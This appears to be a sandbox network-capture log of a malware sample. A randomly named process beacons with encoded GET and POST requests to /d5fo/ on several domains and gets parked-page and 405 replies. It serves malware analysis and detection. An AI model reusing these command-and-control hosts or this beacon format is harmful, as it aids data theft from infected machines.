7b7D=V0RUYVYhHaYmSSIHfBB+ucZgTxeNcAyuGeqW3svjIyU9w2gSLjeVHd00GjharkSgM6q9lBs2zVuBzq3102ZJOEG4RRIR8kL2W9VD0oAmrtsanMK27PM/M3YCYy9jbgEnqNkdKGk3SRpClh42pjDd3I+Hl9d5I38oqTZIehpX+UA99jy/bo0ke4jvJwDrgZ638vJnu3rs0SlGl1i/XoLM3QgUlVNi5l2G1nwXbJ7Vjm1SfWMQrWDkW5bYIvpDsQHLDB4Nbug39/EV6W62KA48SK5SEnzyLKR0panAWGrapKJieaE+IC3Ik/MO4MIe+g9RZkqq1ASda7tbUyRkp52Mbg9NVCW93R5vPCxmToNvY4FwHsOqR+v7HrOFHuvLeLsT0QShOUcZVerwiWOQ0R4uDSnFKRoxTprzyVtfuL33jykxOLcuM8Gv8qpbd6oCzuRc8p5TrJTS7gwgEG0tKFy0zCQg2BkdIp0CKDNyM9BkO7OVd6FUv8XM7CK+54ZrgLg67H9RI0fyy3UlK/SBilGZQfUMcq+rXJvQo+BJmyQNbNc4qHdODZZDs0eRX9dqZ3RzYPOvy7AAOqhWeTC1WUuKQkO4Dr7iS6d5VrkqSvW10NgDiTGR950svE5PSeAsvEqKcMShVoohARJzc0rp2ylg+/q10q73PtjAkTtNZGZ8f58Apd/uN5ZLAJp8NdViDl5gkg6Orln2znLbSaF331H1hUcQN1jzelbYfiRfg8PbQZw1JnGLo/5Yibe81vATpLJoifjML/KwsFvn1jcY9zwQhyH8OYd4O2Dp/5ATSeBFDSvly6/hA30WgDENcSPWKZDMy5If+JrihkpODQQ9X8L7cFEG1S5M50OiQ0BW4Ae1P6Z5S2FO0qnRBvKqye+1d6CPLFbC+RBcvgcmAzFggqxqOPhPSVO26fOjqJmBaQ2WgoZGKAMVidCHKTYEFzNovdctLzA00pyu3w1D34N/i7tY3x05pUDBYdX0wk/CH6yIISxV5G/ [TRUNCATED]
Jul 25, 2024 12:07:43.967935085 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:07:43 GMT Server: Apache X-ServerIndex: llim605 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f [TRUNCATED] Data Ascii: 1aa7<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.biotecnology.org</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la página de:</p> [TRUNCATED]
Jul 25, 2024 12:07:43.968303919 CEST	224	IN	Data Raw: 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 Data Ascii: <h1>www.biotecnology.org</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL--
Jul 25, 2024 12:07:43.968319893 CEST	1236	IN	Data Raw: 3e 3c 21 2d 2d 54 45 52 4d 49 4e 41 5f 50 49 45 5f 50 45 52 53 4f 4e 41 4c 2d 2d 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d Data Ascii: >...TERMINA_PIE_PERSONAL--> </div> <div class="back" style="background-color:#;"></div></header>... end client -->... foot -->...COMIENZA_PIE_POR_DEFECTO--><section class="search"> <div class="center"> <di
Jul 25, 2024 12:07:43.969156027 CEST	1236	IN	Data Raw: 63 74 6f 73 20 65 6e 20 6c 61 20 70 61 72 74 65 20 69 6e 66 65 72 69 6f 72 2e 3c 2f 70 3e 0d 0a 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 3c 2f 61 73 69 64 65 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 73 69 6d 70 6c 65 22 3e 0d 0a 20 20 Data Ascii: ctos en la parte inferior.</p> </div></aside><section class="simple"> <span>Nuestros Productos</span> <div class="line"> <div class="center"> <a href="https://www.piensasolutions.com/web-sencilla?utm_so
Jul 25, 2024 12:07:43.969167948 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 77 65 62 2e 70 6e 67 22 3e 0d 0a 20 Data Ascii: <img src="https://piensasolutions.com/imgs/parking/icon-web.png"> <h2>MI PÁGINA WEB</h2> <p>Diseña tu propia página web de forma profesional y de una manera rápida y s
Jul 25, 2024 12:07:43.970809937 CEST	672	IN	Data Raw: 3c 2f 64 69 76 3e 0d 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 63 6f 6d 70 6c 65 78 22 3e 0d 0a 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 70 69 65 6e 73 61 73 6f 6c 75 Data Ascii: </div></section><section class="complex"> <a href="https://www.piensasolutions.com/dominios?utm_source=parking&utm_medium=link&utm_campaign=dominiosblock"> <span>Registro de dominios</span> <p>Te ofrecemos si
Jul 25, 2024 12:07:43.970823050 CEST	1212	IN	Data Raw: 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69 3e 20 46 69 6c 74 72 6f 20 41 6e 74 69 73 70 61 6d 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 3e 3c 69 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 6f 6b 22 3e 3c 2f 69 3e 20 35 20 Data Ascii: ss="icon-ok"></i> Filtro Antispam</li> <li><i class="icon-ok"></i> 5 Cuentas de correo redirigido</li> </ul> </a></section><footer> <a class="logo" href="https://www.piensasolutions.com?utm_source=parking&am

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49721	217.76.156.252	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:07:45.795627117 CEST	482	OUT	GET /d5fo/?7b7D=Y250bjw/Eb4JaDsvBgJQoO5DcTGKRg2TY8WwpeWRYSxf0AM6NgGJQ+gzPFJsrW2WCqa86REIjEj/npni0ixUVU6cRhsYsQ6/GuFWj4cc/ehEtPjcsd8gcWhpaBoMEh18pg==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.biotecnology.org Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:07:46.471828938 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Thu, 25 Jul 2024 10:07:46 GMT Server: Apache X-ServerIndex: llim604 Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 Data Raw: 31 61 61 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 49 53 4f 2d 38 38 35 39 2d 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 20 2f 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 63 73 73 2f 70 61 72 6b 69 6e 67 32 2e 63 73 73 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f [TRUNCATED] Data Ascii: 1aa7<!DOCTYPE HTML><html lang="es"><head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1" /> <title>www.biotecnology.org</title> <meta name="description" content="" /> <link rel="stylesheet" href="https://piensasolutions.com/css/parking2.css"> <link href='https://fonts.googleapis.com/css?family=Exo' rel='stylesheet' type='text/css'> <meta id="theWidth" name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"> <script> window.onload = function () { if(screen.width <= 420) { var mvp = document.getElementById('theWidth'); mvp.setAttribute('content','width=400'); } } </script></head><body>... client --><header> <div class="center" style="color:#;border-color:#;"> <div class="title"> <img src="https://piensasolutions.com/imgs/parking/icon-parking.png"> <p>Esta es la página de:</p> [TRUNCATED]
Jul 25, 2024 12:07:46.472299099 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 3c 68 31 3e 77 77 77 2e 62 69 6f 74 65 63 6e 6f 6c 6f 67 79 2e 6f 72 67 3c 2f 68 31 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 21 2d 2d 43 4f 4d 49 45 4e 5a 41 5f 54 45 58 54 4f 5f 52 45 Data Ascii: <h1>www.biotecnology.org</h1> </div> ...COMIENZA_TEXTO_REGISTRANTE-->...TERMINA_TEXTO_REGISTRANTE--> ...COMIENZA_COMENTARIO-->...TERMINA_COMENTARIO--> ...COMIENZA_PIE_PERSONAL-->...TERMINA_PIE_PE
Jul 25, 2024 12:07:46.472316980 CEST	1236	IN	Data Raw: 73 6f 6c 75 74 69 6f 6e 73 2e 63 6f 6d 2f 69 6d 67 73 2f 70 61 72 6b 69 6e 67 2f 69 63 6f 6e 2d 64 65 73 70 6c 65 67 61 72 2e 6a 70 67 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 3e 57 45 42 20 41 4c 4f 4a 41 44 41 20 45 4e 20 50 49 45 4e Data Ascii: solutions.com/imgs/parking/icon-desplegar.jpg"> <span>WEB ALOJADA EN PIENSA SOLUTIONS</span> <p>Si quieres obtener más información para crear tu propio proyecto online, consulta nuestros productos en la parte in
Jul 25, 2024 12:07:46.473536015 CEST	1236	IN	Data Raw: 63 69 6f 2e 3c 2f 70 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 3e 76 65 72 20 6d 26 61 61 63 75 74 65 3b 73 3c 2f 62 75 74 74 6f 6e 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 3c Data Ascii: cio.</p> <button>ver más</button> </article></a> <a href="https://www.piensasolutions.com/crear-web?utm_source=parking&utm_medium=link&utm_campaign=web"><article> <img
Jul 25, 2024 12:07:46.473551989 CEST	1236	IN	Data Raw: 20 20 3c 68 32 3e 43 4f 52 52 45 4f 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 3e 43 6f 72 72 65 6f 20 63 6f 6e 20 61 63 63 65 73 6f 20 73 65 67 75 72 6f 20 70 61 72 61 20 74 75 73 20 62 75 7a 6f 6e 65 73 2e 20 43 Data Ascii: <h2>CORREO</h2> <p>Correo con acceso seguro para tus buzones. Con funcionalidades colaborativas. </p> <button>ver más</button> </article></a>--> </div> </div></section>
Jul 25, 2024 12:07:46.476289988 CEST	872	IN	Data Raw: 6b 73 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 70 69 65 6e 73 61 73 6f 6c 75 74 69 6f 6e 73 22 Data Ascii: ks"> <li> <a href="https://www.facebook.com/piensasolutions" class="lower" target="_blank" title="Sguenos en Facebook"> <img src="https://piensasolutions.com/imgs/parking/icon-facebook-small.png"></div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49723	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:15.774245977 CEST	756	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.bitmapsportsbook.com Origin: http://www.bitmapsportsbook.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Referer: http://www.bitmapsportsbook.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 67 63 48 59 2b 43 77 78 58 77 79 67 64 30 36 76 49 6f 38 75 65 6d 4d 51 70 50 51 36 6d 2b 2b 33 56 4d 43 56 35 74 79 46 31 4a 58 34 2b 76 55 35 49 4f 4b 54 54 63 4a 49 48 6c 74 2b 2b 67 43 6d 4d 76 41 39 45 66 76 65 67 66 61 33 54 56 64 45 56 4e 33 31 6c 37 4b 49 75 36 58 68 51 69 68 71 34 4c 54 39 51 65 34 5a 6f 6f 57 31 4d 57 66 49 43 2f 77 6f 6c 4b 41 71 49 4b 4e 4c 69 47 4c 4d 43 67 58 72 48 56 71 6c 55 74 63 44 42 6b 47 7a 2b 56 74 79 56 2b 73 70 66 34 34 76 50 44 6e 4a 39 4f 77 6a 44 79 6c 59 77 33 6d 41 6b 54 69 4a 46 36 51 57 7a 6c 6b 49 76 48 46 46 78 4e 55 78 34 48 72 34 43 43 77 3d Data Ascii: 7b7D=gcHY+CwxXwygd06vIo8uemMQpPQ6m++3VMCV5tyF1JX4+vU5IOKTTcJIHlt++gCmMvA9Efvegfa3TVdEVN31l7KIu6XhQihq4LT9Qe4ZooW1MWfIC/wolKAqIKNLiGLMCgXrHVqlUtcDBkGz+VtyV+spf44vPDnJ9OwjDylYw3mAkTiJF6QWzlkIvHFFxNUx4Hr4CCw=
Jul 25, 2024 12:08:16.526175022 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:08:16 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49724	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:18.307925940 CEST	776	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.bitmapsportsbook.com Origin: http://www.bitmapsportsbook.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Referer: http://www.bitmapsportsbook.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 67 63 48 59 2b 43 77 78 58 77 79 67 64 56 4b 76 48 76 6f 75 66 47 4d 54 31 66 51 36 77 4f 2b 7a 56 4d 47 56 35 74 62 43 31 62 44 34 6e 4c 51 35 47 73 75 54 57 63 4a 49 66 31 74 37 6a 77 44 6f 4d 6f 49 62 45 65 44 65 67 66 4f 33 54 58 56 45 56 2b 66 32 71 4c 4b 47 79 36 58 6e 55 69 68 71 34 4c 54 39 51 65 73 6a 6f 6f 4f 31 4d 6d 76 49 43 65 77 70 74 71 41 31 41 71 4e 4c 77 32 4c 49 43 67 57 47 48 55 32 66 55 75 6b 44 42 68 69 7a 2f 48 46 31 4d 4f 73 76 52 59 35 49 4b 77 47 4e 33 64 73 42 4b 53 35 51 68 56 32 79 73 46 50 6a 66 59 59 2b 67 46 49 77 2f 55 4e 79 67 39 31 59 69 6b 37 49 63 56 6d 57 6a 71 38 4d 41 53 6d 70 72 76 39 44 46 41 39 61 79 7a 47 7a Data Ascii: 7b7D=gcHY+CwxXwygdVKvHvoufGMT1fQ6wO+zVMGV5tbC1bD4nLQ5GsuTWcJIf1t7jwDoMoIbEeDegfO3TXVEV+f2qLKGy6XnUihq4LT9QesjooO1MmvICewptqA1AqNLw2LICgWGHU2fUukDBhiz/HF1MOsvRY5IKwGN3dsBKS5QhV2ysFPjfYY+gFIw/UNyg91Yik7IcVmWjq8MASmprv9DFA9ayzGz
Jul 25, 2024 12:08:19.008838892 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:08:18 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.5	49725	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:20.839744091 CEST	1793	OUT	POST /d5fo/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate Host: www.bitmapsportsbook.com Origin: http://www.bitmapsportsbook.com Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1241 Referer: http://www.bitmapsportsbook.com/d5fo/ User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0 Data Raw: 37 62 37 44 3d 67 63 48 59 2b 43 77 78 58 77 79 67 64 56 4b 76 48 76 6f 75 66 47 4d 54 31 66 51 36 77 4f 2b 7a 56 4d 47 56 35 74 62 43 31 62 37 34 37 75 45 35 4a 73 53 54 56 63 4a 49 57 56 74 36 6a 77 43 30 4d 70 73 48 45 65 66 30 67 5a 43 33 54 31 74 45 54 50 66 32 39 37 4b 47 71 36 58 6d 51 69 68 46 34 49 72 35 51 65 38 6a 6f 6f 4f 31 4d 6b 6e 49 4c 76 77 70 72 71 41 71 49 4b 4e 58 69 47 4c 73 43 6b 36 34 48 55 7a 6f 56 65 45 44 42 42 53 7a 34 79 78 31 46 4f 73 74 63 34 35 51 4b 77 4b 43 33 64 77 33 4b 52 6b 4c 68 58 57 79 73 44 32 4a 50 34 6b 79 7a 46 59 33 79 56 5a 76 77 71 59 30 6c 55 72 67 55 6e 71 44 6e 5a 55 4d 57 79 6d 74 68 4d 55 33 64 6e 70 76 37 54 7a 34 33 6f 68 6f 2b 4c 72 74 59 38 59 55 4e 4c 34 72 67 37 76 6e 51 6d 38 4c 7a 6c 33 74 35 36 45 31 41 6e 36 35 32 44 4a 31 66 6f 76 41 2f 4f 2b 65 47 4d 63 33 4b 74 55 5a 33 53 70 50 35 6e 7a 67 4f 33 6f 63 68 6c 79 64 41 47 65 43 69 55 2f 72 6f 50 59 57 59 41 34 59 6e 47 71 33 6e 32 59 39 52 65 33 38 67 47 66 34 33 6c 52 32 71 42 36 62 65 [TRUNCATED] Data Ascii: 7b7D=gcHY+CwxXwygdVKvHvoufGMT1fQ6wO+zVMGV5tbC1b747uE5JsSTVcJIWVt6jwC0MpsHEef0gZC3T1tETPf297KGq6XmQihF4Ir5Qe8jooO1MknILvwprqAqIKNXiGLsCk64HUzoVeEDBBSz4yx1FOstc45QKwKC3dw3KRkLhXWysD2JP4kyzFY3yVZvwqY0lUrgUnqDnZUMWymthMU3dnpv7Tz43oho+LrtY8YUNL4rg7vnQm8Lzl3t56E1An652DJ1fovA/O+eGMc3KtUZ3SpP5nzgO3ochlydAGeCiU/roPYWYA4YnGq3n2Y9Re38gGf43lR2qB6beSflL+HCCDHNPO9KkNc/0xye0vEaIzYHP6g2thQYxrTGUOSQv4zCuIWo+HPLbO9U4BsN+dD5lrCmHvOuaAU2m6XhHzLNODL+GHmYZ6Iv+rSE1YMVdaNEIl9ngvt3rUG5vMJfAOV5x6GHMCQQxV7TNOjn5cOLA+zUpuG7jV4vw79f6GoHNLDIZud+PBJW5OxPDpZ3AB+rPc/sbGwQrHvFRk839F9p/10jXusiEedDM/bcswf0L0IKX8f80FxbGhDpkNty2qYbI29WlvQKG9wm47iDmAL3aBoNdYMzMuOiJtP0pT1g9nXofiM+tMS89cvU3tD3c04RDbo+iq0lKswg5wbaWCQ6Ir5pP02q3Gv57aQCewgACa5OTyHon3vtTav9WkLUewW14zV7G2Mho8CrjGYp0YA2OKAu8Yadj2KLG5LzTijLhQrnu/xiG88KIyJQQB1xzMFGTrOC5J+KAITNtYuRSo7C8O+km90suUrNdE3FWxfwu+BTUU9+CkVkompxxVII7iRfzv3oOhw0kkPbB7V09BWayKejSefL8U26Pc/Y7jEzqIUObGgBAottLTqJSS29D3sEuIvYG4fcL/rWFB1W/Tklm7AblCuOSCEJQzYtwjm9WuNj2fk08sfjMAEL/hq4/O61+csbmAMsObcL0wD9U6UygwDuy5H [TRUNCATED]
Jul 25, 2024 12:08:21.514210939 CEST	305	IN	HTTP/1.1 405 Not Allowed date: Thu, 25 Jul 2024 10:08:21 GMT content-type: text/html content-length: 154 server: Parking/1.0 connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49726	91.195.240.19	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
Jul 25, 2024 12:08:23.370387077 CEST	486	OUT	GET /d5fo/?7b7D=tev49yANRQivQ2H4f+MkRUEB2Mcj1uW8WqvLk8Twyqy4p8R5Cvi5e/R3eBho8SytCOZYadrHp/TLGFpXXvbZlqSupKHvTXQyyrLbAfI6hIrWLGnSWN9T94Bpfqoaz0W+fg==&jlx=Zd48SBF0d HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9 Host: www.bitmapsportsbook.com Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:36.0) Gecko/20100101 Firefox/36.0
Jul 25, 2024 12:08:24.017417908 CEST	113	IN	HTTP/1.1 439 date: Thu, 25 Jul 2024 10:08:23 GMT content-length: 0 server: Parking/1.0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	49727	67.223.117.189	80	5880	C:\Program Files (x86)\YoCxvVfDMaSCvFODOTDaTZSbbVmWvzFYMTaiJWvLOeXwrN\ljryBmFNsYlm.exe

Timestamp	Bytes transferred	Direction	Data
